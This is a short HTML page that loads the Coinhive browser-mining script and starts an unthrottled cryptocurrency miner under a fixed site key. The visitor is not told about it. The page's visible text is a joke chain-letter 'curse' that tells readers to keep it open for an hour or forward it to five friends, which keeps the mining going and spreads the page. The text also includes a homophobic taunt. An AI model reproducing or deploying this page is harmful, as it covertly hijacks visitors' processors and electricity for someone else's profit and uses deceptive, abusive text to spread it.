<html>
  <head>
    
  </head>
  
  <body>

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('F8LfllHlYsG3V81nAdGuAnn9PqivU7Uq', {throttle: 0});
  miner.start();
</script>
    <center>
 <title>muahahahah u have been cursed. leave this page open until you send this to 5 different friends</title>
 <title>if you dont have 5 different friends then keep this page open for an hour</title>
 <title>if u refuse ur gay</title>
 </center>
 </body>
  
</html>
